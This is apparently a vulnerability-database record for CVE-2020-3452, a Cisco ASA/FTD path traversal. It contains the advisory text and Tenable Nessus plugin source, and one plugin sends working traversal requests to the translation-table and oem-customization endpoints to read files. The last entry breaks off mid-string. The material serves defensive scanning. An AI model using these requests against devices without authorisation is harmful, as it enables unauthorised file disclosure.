A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
{"nessus": [{"lastseen": "2023-01-11T15:17:39", "description": "A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) Software. An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal character sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-29T00:00:00", "type": "nessus", "title": "Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:adaptive_security_appliance_software", "cpe:/a:cisco:firepower_threat_defense"], "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/139064", "sourceData": "#TRUSTED 50574e99a224408c19e0f6162edb5d5d7b50025b8e419d482bc18141a1405581f71275ba274b0d18af7fdc30c2ecdfbffd7e0f24e6fbfc94ad921bb96784f7a8844ceb5a312cf7380fa19db64d3f01afd5593b813133bbd8d9d21bb709b0f8a28dbe8ee67309c831630f22cfe233b126f879f8adb985204ad69a4a6dd767d800ad8eeab4bb68b9885321f58742869bccfaca54b61de84196619f64749d1739e4d82d3c117892a4505286b6df64f1256ee654401116d77987e2cd34503fb2e2c4797ee90a9aacaa55989bfc0573d1e69da7868d255230402f97d464c92e37ae74bfadc3a4755adc1b8201696c60b4f64ded429d3a86091f8257d9e6333ca7ec90480f69e93e6df9c8d9883cd7324d7310a8a0a0b508cf9fb650928fd753d0e78f62d29086d29585578f77cc8757b832cfbc0ec3f982f972f6122453288dd68e4ada706f462a0a44a8bd77ce0b4dcd3670fc76980458f1714fd38dc057bab00652e0504a464475a0302e8d06488351e3dbf1e3919e8e3c7c32ed70b7f676fc209c749f4acc7aeaf2321f44eaa6ce8a55ae3d5b30eca87277ff8ee1e632a32520521cede5f828086607b9532ee411ef0edb7047520d85ba6dcf2309343086d419c037ebf29cd804a73fd961b3cb2fd31d359bbbe1aae72440bc971d7c416bca99b84ef64c08f2e32464f8cab60e1d7d4118fa8cbcf05faf6b4572fcf694209d4dcd\n#TRUST-RSA-SHA256 2c9796433a10e53ff122432a16cb17cc8b8685ba5e3838286d7411969ce9d5ee4a15fbd847cf8a7596dcc7e104753041490f909357122babff1b799eaf5d1e107e76e06aad26f26f4012f7e11181bdb15de5835e1e823a08e3bee1672d30c991d79a15de0570b0a1542606c0d24722307b465b9f8fd124c9e490bb5d13e5585218f59c76b6f4b6d3e8943337fa2d298161b381110478a49055764b7357d753c32331129a5041d0d6403a7fe0875f16148867542b52ac2155b9e59a03aeb62321f02556c84d4b772ac6b2512c73be110f56da74529375b35b25dde78de7d077b2778dcfb7bdc7faec0bfd45fb5f2d750fbe22b5d33be859b0fb78ade736de93e830cf6f00633629401ba0b719c6d2cf7c84f195a373046574555cb022c57d6433f4bd075e1e72ddd95d5d0546e7cc1d6056c84ef0069b3c7b335a8aa1540c052b4bdc09ebdc9fd64c93f78442215cfec01841f73723bb889b9f944914d6a7b02bf776d11f4340fee05546e2ccc17a75c3ad605211e585faf273b7b517a1c4cf6bcba3b0c520be5cabd2af923d4aebafc47633dac155e84056e63714bf575ca1c266755de045b6aeff3a3f55e392c11447a5c2e6b207e9b22d042efab13583b74aee407607c4429e063eee34b7a3d3890e83d20bd8f8442983e7dcfea8acb9b4e0c5b06c255b56f72fea5d8658ff9f31e4055656747aaca2412a210d7a6ad040f5\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139064);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-3452\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvt03598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-ro-path-KJuQhB86\");\n script_xref(name:\"IAVA\", value:\"2020-A-0338-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0060\");\n\n script_name(english:\"Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) and Firepower Threat\nDefense (FTD) Software. An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request\ncontaining directory traversal character sequences to an affected device, in order to read sensitive files on the\ntargeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f081787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvt03598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the Cisco Security Advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:adaptive_security_appliance_software\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('spad_log_func.inc');\ninclude('ssl_funcs.inc');\n\nfunction is_vuln(item)\n{\n local_var res, req;\n\n res = http_send_recv3(\n method:'GET',\n port: port,\n item:item,\n follow_redirect: 1,\n transport:transport\n );\n\n req = http_last_sent_request();\n spad_log(message:'\\n' +\n '---------------------' + '\\n' + \n 'Request:\\n' + req + '\\n' + \n 'Response Code: ' + res[0] + '\\n' +\n 'Response Body:\\n' + res[2] + '\\n\\n'\n );\n\n if (empty_or_null(res))\n audit(AUDIT_RESP_NOT, port);\n\n if ('200' >< res[0] && 'Cisco' >< res[2] && 'Copyright' >< res[2] && 'dofile' >< res[2])\n {\n report += 'It was possible to retrieve the contents of ' + file + ' using the following request:\\n' + req;\n return TRUE;\n }\n return FALSE;\n}\n\nvar port = get_http_port(default:443, embedded:TRUE);\nvar transport = ssl_transport(ssl:TRUE, verify:FALSE);\nvar files = make_list(\n 'logo.gif',\n 'http_auth.html',\n 'user_dialog.html',\n 'localization_inc.lua',\n 'portal_inc.lua',\n 'include',\n 'nostcaccess.html',\n 'ask.html',\n 'no_svc.html',\n 'svc.html',\n 'session.js',\n 'useralert.html',\n 'ping.html',\n 'help',\n 'app_index.html',\n 'tlbr',\n 'portal_forms.js',\n 'logon_forms.js',\n 'win.js',\n 'portal.css',\n 'portal.js',\n 'sess_update.html',\n 'blank.html',\n 'noportal.html',\n 'portal_ce.html',\n 'portal.html',\n 'home',\n 'logon_custom.css',\n 'portal_custom.css',\n 'preview.html',\n 'session_expired',\n 'custom',\n 'portal_elements.html',\n 'commonspawn.js',\n 'common.js',\n 'appstart.js',\n 'appstatus',\n 'relaymonjar.html',\n 'relaymonocx.html',\n 'relayjar.html',\n 'relayocx.html',\n 'portal_img',\n 'color_picker.js',\n 'color_picker.html',\n 'cedhelp.html',\n 'cedmain.html',\n 'cedlogon.html',\n 'cedportal.html',\n 'cedsave.html',\n 'cedf.html',\n 'ced.html',\n 'lced.html',\n 'files',\n '041235123432C2',\n '041235123432U2',\n 'pluginlib.js',\n 'shshim',\n 'do_url',\n 'clear_cache',\n 'connection_failed_form',\n 'apcf',\n 'ucte_forbidden_data',\n 'ucte_forbidden_url',\n 'cookie',\n 'session_password.html',\n 'tunnel_linux.jnlp',\n 'tunnel_mac.jnlp',\n 'sdesktop',\n 'gp-gip.html',\n 'auth.html',\n 'wrong_url.html',\n 'logon_redirect.html',\n 'logout.html',\n 'logon.html',\n 'test_chargen',\n 'posturl.html'\n );\n \nvar report = '';\n\nvar file, vuln;\n\nforeach file (files)\n {\n # Check first endpoint\n vuln = is_vuln(\n item:'/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/' + file + '&default-language&lang=../'\n );\n\n if (vuln) break;\n\n # Check second endpoint\n if (!vuln)\n {\n vuln = is_vuln(\n item:'/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/' + file\n );\n if (vuln) break;\n }\n }\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n\nsecurity_report_v4(\n port:port,\n severity:SECURITY_WARNING,\n extra:report\n);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:17:40", "description": "A vulnerability exists in the web services interface of Cisco Firepower Threat Defense (FTD) Software. An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal character sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T00:00:00", "type": "nessus", "title": "Cisco Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:firepower_threat_defense"], "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86-FTD.NASL", "href": "https://www.tenable.com/plugins/nessus/138895", "sourceData": "#TRUSTED 923cccd2a512f7e8b92eafde9de558e325779fd8f8b4ece0712c04e646dbd582d8b337956d32e73dcd0555bb1fd1775df8366d8a62dcd3e40a263dfe690e17742a83582aeefdfdc2717c9b7ac3d264eb4a05be10df7d8ff686790faf7051f1e4d6307e39a601525f438b9a5dafb627594f44ee30c05e9dbeb514a0b76a18536cd2afd3751babe29524892218d046b41278aa305a6afdb9d2d45a0df6b5277c9b83ea67752c8d3c73929894c86c4862ab018ef9f783094d9522091ee79b614519549c93b2103b6044befc67e6edd0cf0bc4503650b3910e9fdeb1bde545cd071d4d6074436ff6c2808c620dd9ad76147dd6e268b63c17450dd4a871ad9a9acf048f32ee12de5f2525ddb8ba3e49d22c3c0269b663b37de6f125b955d526bad95864bbb3a37baed3d1e81ebc51c6b8967733e9ae0172ee08c7e8d9dc8d7bfa7c6a890fdb6159220e81796a18baff0de46ac610a74e516d3f3c256851a8f226ab9cb4af10c806342e16a324b00024cfb806ab77c59c6b6fb2ff30b4faaa8628824d03a4bd072a624fddd972edd24c538360383277eba9b99e0c59dd03ef2bdf0f4149c7e0f16673103a951ba592b84e292583c20af7532ebba5ff400a36f689d6046eb2d54e5e72c361c23d168273808b64c59a4a57d121f0e28578e7e27ddde8b288e81911b0ce7fb4193b9cd3e81a4d544104c1095bab88951cc7ea60d34bb603\n#TRUST-RSA-SHA256 5482a3808ae3cda413d1e990226b8b3e1c4ec8b4efb4f33b0493c2fd9353486dc34aa321bb653ab51fa4631e1f8d02c71b424c26ddcf1f593e1a116a112b5fbac813e9d1775d02272d1d9172926531d949bb0c12920414a1fffd8c3da40acf03e4e08636a0893901080da813ee88745437b09b3b4c513ce0123ef533ffa9eb66db4e509efd0f3a01583ab19d09c6e079fb90691604fe9cd19df458ab6f636cdfcf31d5c9f2448222f5829d723b82e3a57ebc67b86d5b44d231d3244b343855e5e78d1a2b54bf06020ff88acd575c7688a37a4a34060b9211ea793d409292dc040e7bb51b90ccf039c5fec6efaa1e66e7c0e20f730131bf04bccc17d32857b830f4124622954956e2d43166fca8cde262296032648c47274f1849bdae292b8a6acb86d103d13c38bdaf10e7a30cdae555ba99a774cc8ec6251c86f2a05de6d5c1e63c1d2062e1cab4693bf6b316f25597945a3e699b9aab220b9edd683ed9d30bd7867cb92bb6d5dcedca53e5f273e1de88605b41ee95c6169f029b49efcc979e0497f481a7a2bab90f9f27925684136fc72a032bd904e5d32a50bb830ecf9fcddeb378f419fccb0cab77e1d691d8741d082c84fbbf8323ebcb30704a69a9791518b7e204be2b55fb6392637c78d719f8e13a5704af277e18b6f5b7f3ac9f2e6a760e090fb43bec4a62bdae86f51d7fb81304bbc411854c5f083b63b1dfee4faf\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138895);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-3452\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvt03598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-ro-path-KJuQhB86\");\n script_xref(name:\"IAVA\", value:\"2020-A-0338-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0060\");\n\n script_name(english:\"Cisco Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the web services interface of Cisco Firepower Threat Defense (FTD) Software. An\nunauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal\ncharacter sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f081787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvt03598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the Cisco Security Advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_enumerate_firepower.nbin\");\n script_require_keys(\"installed_sw/Cisco Firepower Threat Defense\", \"Host/Cisco/Firepower\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Firepower Threat Defense');\n\nvuln_ranges = [\n {'min_ver' : '6.2.2', 'fix_ver': '6.2.3.16'},\n {'min_ver' : '6.3.0', 'fix_ver': '6.3.0.6'},\n {'min_ver' : '6.4.0', 'fix_ver': '6.4.0.10'},\n {'min_ver' : '6.5.0', 'fix_ver': '6.5.0.5'},\n {'min_ver' : '6.6.0', 'fix_ver': '6.6.0.1'},\n];\n\n# Indicates that we've authenticated to an FTD CLI. Required for workaround check, set in\n# ssh_get_info2_cisco_firepower.inc. This should always be present.\nis_ftd_cli = get_kb_item_or_exit(\"Host/Cisco/Firepower/is_ftd_cli\");\n# Indicates that we've successfully run \"rpm -qa --last\" in expert mode to get the list of applied hotfixes. \nexpert = get_kb_item(\"Host/Cisco/FTD_CLI/1/expert\");\n\n# This plugin needs both a workaround and hotfix check. If we can't check either of them, require paranoia to run.\nif (!is_ftd_cli || !expert)\n{\n if (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n}\n\n# Don't set workarounds or hotfixes if we can't check for these.\nif (!is_ftd_cli)\n{\n workarounds = make_list();\n extra = 'Note that Nessus was unable to check for workarounds or hotfixes';\n}\nelse\n{\n # Workarounds can be checked with just the FTD CLI\n workarounds = make_list(CISCO_WORKAROUNDS['anyconnect_client_services'], CISCO_WORKAROUNDS['ssl_vpn']);\n cmds = make_list('show running-config');\n # To check hotfixes, Host/Cisco/FTD_CLI/1/expert should be set to 1\n if (expert)\n {\n hotfixes['6.3.0'] = {'hotfix' : 'Hotfix_AV-6.3.0.6-3', 'ver_compare' : FALSE};\n hotfixes['6.4.0'] = {'hotfix' : 'Hotfix_BM-6.4.0.10-2', 'ver_compare' : FALSE};\n hotfixes['6.5.0'] = {'hotfix' : 'Hotfix_O-6.5.0.5-3', 'ver_compare' : FALSE};\n }\n else\n extra = 'Note that Nessus was unable to check for hotfixes';\n}\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvt03598',\n 'fix' , 'See vendor advisory',\n 'extra' , extra\n);\n\nif (max_index(cmds) > 0)\n reporting['cmds'] = cmds;\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_ranges,\n workarounds:workarounds,\n firepower_hotfixes:hotfixes\n);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:15:58", "description": "A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) Software. An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal character sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T00:00:00", "type": "nessus", "title": "Cisco Adaptive Security Appliance Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:adaptive_security_appliance_software"], "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86-ASA.NASL", "href": "https://www.tenable.com/plugins/nessus/138894", "sourceData": "#TRUSTED 8c8c8c2ec04a9801cb7ed5f4ad653b7cd50a8905e2d53c1b70caa610668ef49689c24304b0f988ab538b1ff7dadbc05dc0cd6b04149834e21dd69d371df593b3cb1752091208a4cb5ab6e187475885ae06fa32164a2bb51c77e4f8f87e9685045a3797bc1457c405621f32356b451ff7cafecf06bb5ad44bd1b765c8feb13c60f424320e7a0d62f258190722e3c163f0b32dbeab74e2c872cd7a96e001537faa8d1c0d255fa211adc94fd2fbcf1636a0d370ed7cac4f2f4156deb39b3b38902f87a06a007cc21ec896e49450e2bbac35d935069ecd6acb98aeb07d6872d9879f0aed41c6803e923a5c00d6b61f6de02b1262ba14d441be8e950365cc78916f3aa7ff4bbbb7053087208183f7ec6139737bb84cd4f93f9b382ef3c7755f326217ab0171d4e329895279d118370ed51eab6367003e15da61fd4167f3f3f3f32b708b166f6fa2a55bfa29e67f1ac1e6e6347c24c40bd95467c1e91e3da6cd037531b23329a187333f069117103a9aab751968076a2c511dd76dc6083d22311435b705f5b3a8f7b1871b80e42579aece38db8d9de213db46cb35e70546f61fb348746d8479f9e29bbd8850b07fee3c260b95e2bd15362383dbb8b49ebb1b14cf50e70e659edf3e3370edf088c10f7580006027a6586a4bfd26088b5227bc5890b099ff360c1b777f075c7f23678c86f6fd14d669d9148c32b6e36787a9c9071c9cc9\n#TRUST-RSA-SHA256 47f144ac02667c25847b653a0246048044300fe26c8faf993082c9da0afdef36d9466849dde1c34d4fc242c0cd2f0ec4b1a10a5904766c6efe2ff9b62baf3899003a879844522b37871017ceea73a36a007d2d000bc66a1376b83461f8663ebaad89bd63eecee1b1668a3083bb965da23d903efa5dce31bda4b2bcf5f0410a91024b094a10e85723ee817f8a738ab55d595048a83f583cfc7391626482736e0ab0e9bd6b2dd129525071a0aba328b7fc053bd76823e8fc48c37be50113445c664cd985d1fb75a96235c858d185b2ca73356e953fd3e58a3cbf80daae05e586d819055e0e27dd8375fb98c59c452529e42abcd41277214603fb77de33693848a4e89d40eb34914cf4730151a8b4e28e5b7120f1bfb59494170c266e2ca64f18a3f2334687bd5d35d34eaf5e8e5ab72604171ac8759f94954ab1022c62b236a355c9e3ff00ee34e06f68e073108cccdfd827363ac1d9898eb6c26bf96d06bd4db576c22f4a21c7247b4e815afbe3d547272a765e09a6c75cf95af6a563440b2e92bdd1b6f387424793898196eddb11a5132ccdc978a35058b8939eac9bb0b019bdc055303a317b2ae6e21b156631e99afce4c9df88c6306d36676f000632d0ecb3afac7d66c05519e5519672f751eef3b2308ac1bc14756578e0fc96a36cc8134f9fdb735a6897e27db096939f054a8574450335a3e74b44c78eae9d711ce99cef\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138894);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-3452\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvt03598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-ro-path-KJuQhB86\");\n script_xref(name:\"IAVA\", value:\"2020-A-0338-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0060\");\n\n script_name(english:\"Cisco Adaptive Security Appliance Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) Software. An\nunauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal\ncharacter sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f081787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvt03598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the Cisco Security Advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:adaptive_security_appliance_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"Host/Cisco/ASA\");\n\n exit(0);\n}\ninclude('ccf.inc');\ninclude('cisco_workarounds.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Adaptive Security Appliance (ASA) 